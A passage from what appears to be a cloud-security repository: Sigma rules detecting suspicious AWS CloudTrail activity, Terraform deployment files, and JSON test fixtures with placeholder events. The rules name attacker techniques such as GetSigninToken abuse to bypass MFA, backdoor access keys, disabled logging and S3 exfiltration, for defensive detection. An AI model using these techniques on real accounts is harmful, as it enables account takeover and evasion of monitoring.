https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml 7 | - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html 8 | - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html 9 | author: Elastic, Austin Songer @austinsonger 10 | date: 2021-07-22 11 | modified: 2022-10-09 12 | tags: 13 | - attack.persistence 14 | - attack.credential-access 15 | - attack.t1098 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: route53.amazonaws.com 22 | eventName: DisableDomainTransferLock 23 | condition: selection 24 | falsepositives: 25 | - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_console_getsignintoken.yml: -------------------------------------------------------------------------------- 1 | title: AWS Console GetSigninToken Potential Abuse 2 | id: f8103686-e3e8-46f3-be72-65f7fcb4aa53 3 | status: test 4 | description: | 5 | Detects potentially suspicious events involving "GetSigninToken". 6 | An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request. 7 | references: 8 | - https://github.com/NetSPI/aws_consoler 9 | - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ 10 | author: Chester Le Bron (@123Le_Bron) 11 | date: 2024-02-26 12 | modified: 2025-04-12 # Modified by adanalvarez 13 | tags: 14 | - attack.lateral-movement 15 | - attack.t1021.007 16 | - attack.t1550.001 17 | logsource: 18 | product: aws 19 | service: cloudtrail 20 | detection: 21 | selection: 22 | eventSource: 'signin.amazonaws.com' 23 | eventName: 'GetSigninToken' 24 | filter_main_console_ua: 25 | userAgent|contains: 'Jersey' 26 | condition: selection and not filter_main_console_ua 27 | falsepositives: 28 | - GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated. 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_lambda_function_url.yml: -------------------------------------------------------------------------------- 1 | title: New AWS Lambda Function URL Configuration Created 2 | id: ec541962-c05a-4420-b9ea-84de072d18f4 3 | status: experimental 4 | description: | 5 | Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. 6 | This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function. 7 | references: 8 | - https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html 9 | - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc 10 | - https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws 11 | author: Ivan Saakov 12 | date: 2024-12-19 13 | tags: 14 | - attack.initial-access 15 | - attack.privilege-escalation 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: lambda.amazonaws.com 22 | eventName: 'CreateFunctionUrlConfig' 23 | condition: selection 24 | falsepositives: 25 | - Creating a Lambda function URL configuration may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 26 | - Creating a Lambda function URL configuration from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 27 | level: medium 28 | -------------------------------------------------------------------------------- /terraform/main.tf: -------------------------------------------------------------------------------- 1 | ############################ 2 | # PROVIDER & DATA 3 | ############################ 4 | provider "aws" { 5 | region = var.aws_region 6 | default_tags { 7 | tags = { 8 | Environment = var.environment 9 | Service = "TrailAlerts" 10 | ManagedBy = "Terraform" 11 | } 12 | } 13 | } 14 | 15 | terraform { 16 | required_providers { 17 | aws = { 18 | source = "hashicorp/aws" 19 | version = "~> 6.0" 20 | } 21 | } 22 | 23 | #backend "s3" { 24 | # bucket = "trailalerts-terraform-state-123123123123" # Change this to your S3 bucket name 25 | # key = "terraform.tfstate" 26 | # region = "us-east-1" 27 | # encrypt = true 28 | #} 29 | } 30 | 31 | module "trailalerts" { 32 | source = "adanalvarez/trailalerts/aws" 33 | version = "0.2.1" 34 | 35 | aws_region = var.aws_region 36 | environment = var.environment 37 | email_endpoint = var.email_endpoint 38 | create_cloudtrail = var.create_cloudtrail 39 | existing_cloudtrail_bucket_name = var.existing_cloudtrail_bucket_name 40 | enable_sns = var.enable_sns 41 | ses_identities = var.ses_identities 42 | source_email = var.source_email 43 | vpnapi_key = var.vpnapi_key 44 | correlation_enabled = var.correlation_enabled 45 | cloudwatch_logs_retention_days = var.cloudwatch_logs_retention_days 46 | notification_cooldown_minutes = var.notification_cooldown_minutes 47 | min_notification_severity = var.min_notification_severity 48 | project = var.project 49 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_data_management_tampering.yml: -------------------------------------------------------------------------------- 1 | title: AWS S3 Data Management Tampering 2 | id: 78b3756a-7804-4ef7-8555-7b9024a02e2d 3 | status: test 4 | description: Detects when a user tampers with S3 data management in Amazon Web Services. 5 | references: 6 | - https://github.com/elastic/detection-rules/pull/1145/files 7 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html 8 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html 9 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html 10 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html 11 | - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html 12 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html 13 | author: Austin Songer @austinsonger 14 | date: 2021-07-24 15 | modified: 2022-10-09 16 | tags: 17 | - attack.exfiltration 18 | - attack.t1537 19 | logsource: 20 | product: aws 21 | service: cloudtrail 22 | detection: 23 | selection: 24 | eventSource: s3.amazonaws.com 25 | eventName: 26 | - PutBucketLogging 27 | - PutBucketWebsite 28 | - PutEncryptionConfiguration 29 | - PutLifecycleConfiguration 30 | - PutReplicationConfiguration 31 | - ReplicateObject 32 | - RestoreObject 33 | condition: selection 34 | falsepositives: 35 | - A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 36 | level: low 37 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_update_login_profile_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AIDA123456789EXAMPLE", 8 | "arn": "arn:aws:iam::123456789012:user/admin", 9 | "accountId": "123456789012", 10 | "accessKeyId": "AKIA123456789EXAMPLE", 11 | "userName": "admin" 12 | }, 13 | "eventTime": "2025-04-12T16:25:48Z", 14 | "eventSource": "iam.amazonaws.com", 15 | "eventName": "UpdateLoginProfile", 16 | "awsRegion": "us-east-1", 17 | "sourceIPAddress": "192.0.2.1", 18 | "userAgent": "aws-cli/2.9.19", 19 | "requestParameters": { 20 | "userName": "victim", 21 | "password": "********", 22 | "passwordResetRequired": false 23 | }, 24 | "responseElements": null, 25 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 26 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 27 | "readOnly": false, 28 | "eventType": "AwsApiCall", 29 | "managementEvent": true, 30 | "recipientAccountId": "123456789012", 31 | "eventCategory": "Management" 32 | } 33 | ], 34 | "should_not_match": [ 35 | { 36 | "eventVersion": "1.09", 37 | "userIdentity": { 38 | "type": "IAMUser", 39 | "principalId": "AIDA123456789EXAMPLE", 40 | "arn": "arn:aws:iam::123456789012:user/user1", 41 | "accountId": "123456789012", 42 | "accessKeyId": "AKIA123456789EXAMPLE", 43 | "userName": "user1" 44 | }, 45 | "eventTime": "2025-04-12T16:28:32Z", 46 | "eventSource": "iam.amazonaws.com", 47 | "eventName": "UpdateLoginProfile", 48 | "awsRegion": "us-east-1", 49 | "sourceIPAddress": "192.0.2.1", 50 | "userAgent": "aws-cli/2.9.19", 51 | "requestParameters": { 52 | "userName": "user1", 53 | "password": "********", 54 | "passwordResetRequired": false 55 | }, 56 | "responseElements": null, 57 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 58 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 59 | "readOnly": false, 60 | "eventType": "AwsApiCall", 61 | "managementEvent": true, 62 | "recipientAccountId": "123456789012", 63 | "eventCategory": "Management" 64 | } 65 | ] 66 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_backdoor_users_keys_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AIDAJ45QHBFG76EXAMPLE", 8 | "arn": "arn:aws:iam::123456789012:user/alice", 9 | "accountId": "123456789012", 10 | "accessKeyId": "AKIAIOSFODNN7EXAMPLE", 11 | "userName": "alice" 12 | }, 13 | "eventTime": "2025-04-12T14:21:36Z", 14 | "eventSource": "iam.amazonaws.com", 15 | "eventName": "CreateAccessKey", 16 | "awsRegion": "us-east-1", 17 | "sourceIPAddress": "192.0.2.1", 18 | "userAgent": "aws-cli/2.17.12 Python/3.11.6 Linux/5.15.0-100-generic exe/x86_64.ubuntu.22", 19 | "requestParameters": { 20 | "userName": "bob" 21 | }, 22 | "responseElements": { 23 | "accessKey": { 24 | "userName": "bob", 25 | "status": "Active", 26 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 27 | "createDate": "2025-04-12T14:21:36Z" 28 | } 29 | }, 30 | "requestID": "9c23c774-e2b5-46fe-83b9-EXAMPLE", 31 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 32 | "readOnly": false, 33 | "eventType": "AwsApiCall", 34 | "managementEvent": true, 35 | "recipientAccountId": "123456789012", 36 | "eventCategory": "Management" 37 | } 38 | ], 39 | "should_not_match": [ 40 | { 41 | "eventVersion": "1.09", 42 | "userIdentity": { 43 | "type": "IAMUser", 44 | "principalId": "AIDAJKF7WHFFX3EXAMPLE", 45 | "arn": "arn:aws:iam::123456789012:user/bob", 46 | "accountId": "123456789012", 47 | "accessKeyId": "AKIAIOSFODNN7EXAMPLE", 48 | "userName": "bob" 49 | }, 50 | "eventTime": "2025-04-12T15:10:22Z", 51 | "eventSource": "iam.amazonaws.com", 52 | "eventName": "CreateAccessKey", 53 | "awsRegion": "us-east-1", 54 | "sourceIPAddress": "192.0.2.3", 55 | "userAgent": "aws-cli/2.17.12 Python/3.11.6 Linux/5.15.0-100-generic exe/x86_64.ubuntu.22", 56 | "requestParameters": { 57 | "userName": "bob" 58 | }, 59 | "responseElements": { 60 | "accessKey": { 61 | "userName": "bob", 62 | "status": "Active", 63 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 64 | "createDate": "2025-04-12T15:10:22Z" 65 | } 66 | }, 67 | "requestID": "7a23d884-e5c5-46fe-83b9-EXAMPLE", 68 | "eventID": "8b9c402c-7ef4-4e68-a21f-EXAMPLE", 69 | "readOnly": false, 70 | "eventType": "AwsApiCall", 71 | "managementEvent": true, 72 | "recipientAccountId": "123456789012", 73 | "eventCategory": "Management" 74 | } 75 | ] 76 | } -------------------------------------------------------------------------------- /terraform/variables.tf: -------------------------------------------------------------------------------- 1 | variable "aws_region" { 2 | description = "The AWS region where all resources will be deployed" 3 | type = string 4 | } 5 | 6 | variable "email_endpoint" { 7 | description = "Email address that will receive security notifications and alerts" 8 | type = string 9 | } 10 | 11 | variable "create_cloudtrail" { 12 | description = "Whether to create CloudTrail and S3 bucket or use existing" 13 | type = bool 14 | default = true 15 | } 16 | 17 | variable "existing_cloudtrail_bucket_name" { 18 | description = "Name of existing CloudTrail bucket when create_cloudtrail is false" 19 | type = string 20 | default = "" 21 | } 22 | 23 | variable "enable_sns" { 24 | description = "Whether to create SNS topic and subscription" 25 | type = bool 26 | default = true 27 | } 28 | 29 | variable "ses_identities" { 30 | description = "List of SES identities to verify and use for email notifications" 31 | type = list(string) 32 | default = [] 33 | } 34 | variable "source_email" { 35 | description = "Email address to use as the source for email notifications" 36 | type = string 37 | default = "" 38 | } 39 | variable "vpnapi_key" { 40 | description = "API key for VPN service integration" 41 | type = string 42 | default = "" 43 | } 44 | 45 | variable "correlation_enabled" { 46 | type = bool 47 | default = false 48 | description = "Whether to enable event correlation analysis - creates a DynamoDB table for storing and analyzing security events" 49 | } 50 | 51 | variable "environment" { 52 | description = "Deployment environment identifier (e.g., dev, prod, staging) for resource tagging and isolation" 53 | type = string 54 | default = "dev" 55 | } 56 | 57 | variable "cloudwatch_logs_retention_days" { 58 | description = "Number of days to retain CloudWatch logs before automatic deletion" 59 | type = number 60 | default = 30 61 | } 62 | 63 | variable "notification_cooldown_minutes" { 64 | description = "Cooldown period in minutes between notifications for the same rule to prevent alert fatigue" 65 | type = number 66 | default = 60 67 | } 68 | 69 | variable "min_notification_severity" { 70 | description = "Minimum severity threshold for sending notifications (critical, high, medium, low, info)" 71 | type = string 72 | default = "medium" 73 | validation { 74 | condition = contains(["critical", "high", "medium", "low", "info"], var.min_notification_severity) 75 | error_message = "The min_notification_severity value must be one of: critical, high, medium, low, info." 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_enum_buckets_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "ListBuckets", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "s3.amazonaws.com", 67 | "eventName": "getObject", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_create_iam_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "iam.amazonaws.com", 27 | "eventName": "CreateUser", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateUser", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_identity_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ses.amazonaws.com", 27 | "eventName": "DeleteIdentity", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteIdentity", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ssm_ssmgetparameter_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ssm.amazonaws.com", 27 | "eventName": "GetParameter", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetParameter", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_disable_logging_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "cloudtrail.amazonaws.com", 27 | "eventName": "StopLogging", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "s3.amazonaws.com", 67 | "eventName": "StopLogging", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_route_added_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "CreateRoute", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | 